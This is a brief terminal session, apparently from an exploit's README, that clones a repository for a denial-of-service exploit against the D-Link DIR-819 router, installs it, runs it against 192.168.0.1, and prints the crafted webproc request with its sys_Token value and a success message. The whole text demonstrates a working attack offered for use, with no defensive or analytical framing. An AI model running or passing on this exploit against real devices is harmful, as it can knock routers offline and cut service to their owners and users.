$ git clone https://github.com/whokilleddb/dlink-dir-819-dos
$ cd dlink-dir-819-dos
$ pip install -r requirements.txt
$ ./exploit.py -i 192.168.0.1
[+] DLink DIR-819 DoS exploit
[i] Address to attack: 192.168.0.1
[i] Using SSL: False
[i] Request Timeout: 30s
[i] Buffer Length: 19
[i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
[+] Exploit Successful!